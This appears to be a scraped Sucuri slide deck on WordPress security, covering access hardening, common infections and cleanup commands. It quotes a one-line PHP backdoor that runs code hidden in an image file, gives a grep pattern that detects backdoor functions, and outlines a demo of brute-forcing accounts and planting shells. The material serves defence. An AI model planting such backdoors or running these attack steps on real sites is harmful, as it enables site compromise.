WordPress Security - Dealing With Today's Hacks

WordPress SecurityDealing with Today’s Hacks

04/11/2023@sucuri_security @perezbox #wclv

SUCURI@WORDCAMP# WHOIS PEREZBOX

ID: Tony Perez

WHO: The Hulk

Username: Perezbox

Process: Sucuri

Services: InfoSec, Harley’s, MMA, Guns

GeoIP: Menifee, California

Why listen to me? You don’t have to, but…

I am not a designer or developer, my passion is Information Security, specifically Web Security

Not an expert, passionate enthusiast

I don’t like people, I like packets, signatures and terminal.

Seriously though, our company:Remediate 200 – 300 infected websites a day,

24/7/365

Perform 2 million + malware website scans a month

Support all CMS platforms and customapplications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc… )

Thoughts To Kick Things Off

Information Security is about risk reduction.

If you’re looking for the “silver bullet” this is the wrong talk for you.

To think that you will never be infected or that you are immune to hacks is like saying you will never be sick.

If someone tells you the opposite you should slap them and have them pay you for wasting your time.

Prevention is ideal, detection is key… bats were created for ________ people…

Know Your EnemyThey have more time and resources

They are intelligent

Majority of attacks are automated

Goal is to impact as many people as possible

Mindset – Own one, own them all…

It’s not personal, it’s business…

Ok, so what’s the problem?

TODAY’s ISSUES:

The Ecosystem / Environment

Access Control

Software Vulnerabilities

Administration

Credential Management

Extensibility

Today’s Focus

Ecosystem / Environment

Access Control

Dealing with Hacks

The EcoSystem / Environment

ApacheMalicious module injects iFrames

http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/

phpMyAdminMirror Hacked

http://sourceforge.net/blog/phpmyadmin-back-door/

PHP-CGIRemote Code Execution

http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html

PleskVulnerable to SQLi attacks

http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html

Uh, what about WordPress?

Logical Architecture

Linux Operating System

Apache

WordPress CPANEL Plesk phpMyAdmin PHP-CGI

Modules

The EcoSystem / Environment

What can you do?Not much… completely outside of your control if you’re using a shared or managed host

But, you can reduce risk...Use a Dedicated / VPS Environment

But recognize the responsibility that this entails, if you what I mentioned previously doesn’t make sense, skip to next step

Go with a Managed HostDoesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on

Access is Key

On the Server:Kill accounts that are not in use

FTP is the devil – slap yourself and switch to SFTP

Filter Shell / SFTP by IP & Keys, Keys at a minimum

Disable Authentication via Passwords on server

WordPress Admin:Multi-Factor Authentication on wp-admin

Apache “Basic Access Authentication”

Two-Factor Authentication on wp-login.phpDuo Two-Factor Authentication Plugin

Employ least privileged:Users with the “administrator” are not needed for every day tasks

Learn to use Editor, Author, Contributor, Subscriber

Gah!?!?!?!?!?!?!

WordPress Loving Infections

Defacements

Backdoors

Pharma Hack

InjectionsiFrame Specifically

Malicious Redirects

Phishing

Before We Dive In

LINUX / UNIX:CURL

Command Usage – Hunting TimThumb

# grep -Eir --include "*thumb.php" 'define.*VERSION' .

- Then –

# curl -D - -A "Windows" http://timthumb.googlecode.com/svn/trunk/timthumb.php>/path-to-file/timthumb.php

Command Usage – Identify Change

Detect Recent Changes

find -type f -ctime -0 | more - OR - find ./ -mtime -1

-ctime = -0 (past 24 hours) | -1 (last 24 hours)

-mtime = -1 (1 day) | -2 (2 days)

Detect Differences

diff –qr /path/dir1 /path/dir2

DefacementsHacktivism at its finest… you now support a cause!?!?!

Defacements

Hacktivism 101Annoying as S*&T

Places to look:Index.html

Index.phpRoot Directory

Wp-Content

Theme Directory

GREP is your friend:grep –ri ‘sniper399’ .

BackdoorsIt’s ok to cry a little…

BackdoorsCommon terms:

Is_bot

Base64_decode

Fclose

readfile

Edoced_46esad

System

Shell_exec

Gzuncompress

FilesMan

grep -RPl --include=*.{php} "(system|exec|passthru|shell_exec|base64_decode|eval|) *\(" /var/www

Pharma HackErectile Dysfunction pills are leading ads.. Who knew..

Pharma HackMulti-million $ Business

Rarely Distribute Malware

Impression based Affiliate Marketing

Google’s Search Engine Result Pages (SERP)

Odds of malware distribution are actually low

Tricks:Embedded within core files

Look for “.tmp” directories = >

Pharma Hack, cntd..

Try using CURL to emulate Google and Windows:Curl –L –A “Googlebot/2.1(+http://www.google.com/bot.html)” http://someinfectedwebsite.com

Google Webmaster ToolsFetch as Google Bot

Check your Theme Index.php file for things like this:

<?php $wp__theme_icon=@create_function(”,@file_get_contents(‘/public_html/wp-content/themes/my-really-good-theme/images/s.jpg’));$wp__theme_icon(); ?>

Pharma Hack, cntd..

InjectionsIt only hurts for a minute…

Injections

Invisible iFrame’s - Executing on your browser

Contributing to Drive-by-Downloads, Pharma, XSS, CSRF

Places to check – Pages that generate content:JS files, Header.php, Index.php, Function.php, Footer.php

Injections, cntd…

PHP iFrame Injection =>Count##.php

Check all Index.php / Theme JS files

Example below:

Injections, cntd…

Pharma Link Injections =>

Drive-By-Downloads

Malicious RedirectsWTF?!?! Why don’t I understand what it says?

Malicious RedirectsRedirects your user to a domain distributing malware, fundamentally different than an ifram injection that executes in your browser

8 out of 10 times, check your .htaccess file – all of them# find /var/www –name .htaccess –type f | wc –l

Check for backdoors also – often a sign of a bigger issue

PhishingBiggest growing problem, exceptionally difficult to detect…

Phishing

Growing at a faster pace than traditional web-malware

No impact to readers, but tied to SPAM bots sending out emails like this:

Phishing, cntd…

DemonstrationBringing the Point Home

Demo Objective

Use good tools for bad things – wpscan

Enumerate the users

Brute Force the User accounts password

Insert an arbitrary Backdoor Shell for Remote Execution

Deface the Website

Insert another Shell Backdoor that provides an interface

I have 5 minutes – Ready?

Keeping it RealRemember the risk discussion?

Guard AccessRevisit Slide 12 – access, access, access

It always comes down to access

We have to change the way we treat and think about access. All access – Server / Application

We are going through the same mistakes servers and desktops were making in the 90’s with access.

Know where you are surfing the web, do you really need to log in as an admin at the coffee shop?

Password Dilemma15 character pass

3 months to crack

Long / Complex / UniqueKey to Passwords

Prefer Password ManagerYou don’t? ok..

Passphrases work tooiLuvWCLVegas:2012:HrtAttckGrll

Come up with a process that works, stick to it:

One scheme:Remember 8 characters

Write Down 8 characters

Save 20 characters

Second scheme:Remember 20 characters

Prefix characters with site name

End sequence with some date

Kill PHP Execution

Kill PHP Execution Directories:

WP-INCLUDES

WP-CONTENT

UPLOADS – At a minimum

Deny from all

</Files>

Disable Theme / Plugin Editor

I’d take it a step further and remove the ability to install, but that’s just me.

Modify WP-CONFIG.PHP With:

Disable the Plugin / Theme EditorDefine(‘DISALLOW_FILE_EDIT’,true);

- OR -

Disable the Plugin / Theme Update and InstallationDefine(‘DISALLOW_FILE_MODS’,true);

UpdateOldest version found in production – 1.5

Leading cause of cross-site contamination issues

Perhaps the simplest of tasks, yet we still find this:

Plugins That HelpClients

Sucuri Security Premium

Duo Two-Factor Authentication

Theme-Check

BackupBuddy

Akismet

Non-Clients

Duo Two-Factor Authentication

Limit Login Attempts

Theme-Check

BackupBuddy

Akismet

Sucuri Blog: http://blog.sucuri.net

SiteCheck Scanner: http://sitecheck.sucuri.net

Unmask Parasites: http://unmaskparasites.com

Perishable Press: http://perishablepress.com/category/web-design/security/

Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress

Hacked – http://wordpress.org/tags/hacked

Malware – http://wordpress.org/tags/malware

BadwareBusters – https://badwarebusters.org

Need a Hand?

Support Forums Online Resources

Sucuri

Tony Perezhttp://sucuri.net |

http://blog.sucuri.net

Twitter:

@sucuri_security

@perezbox and @tonyonsecurity

WordPress Security - Dealing With Today's Hacks

Documents

Lawn Hacks Kitchen Hacks - Protect America · 2016-05-11 · Lawn Hacks Bedroom Hacks Kitchen Hacks To increase curb appeal, repaint your front door with an eye-catching color. For

Life hacks

LinkedIn Hacks

Boston hacks

Memory Hacks

Library Hacks

Ubuntu hacks

Hacks windows8.1

Google Hacks

Photoshop Hacks!

Brain Hacks

Design hacks

Productivity Hacks

Hacks & hackers

Golden hacks

Prospecting Hacks

DataCore Software The Power of Software When Dealing with Today's State of Enterprise IT

Hardware Hacks

Designing hacks

Work Hacks - Productivity Hacks to Optimize Your Time & Maximize Results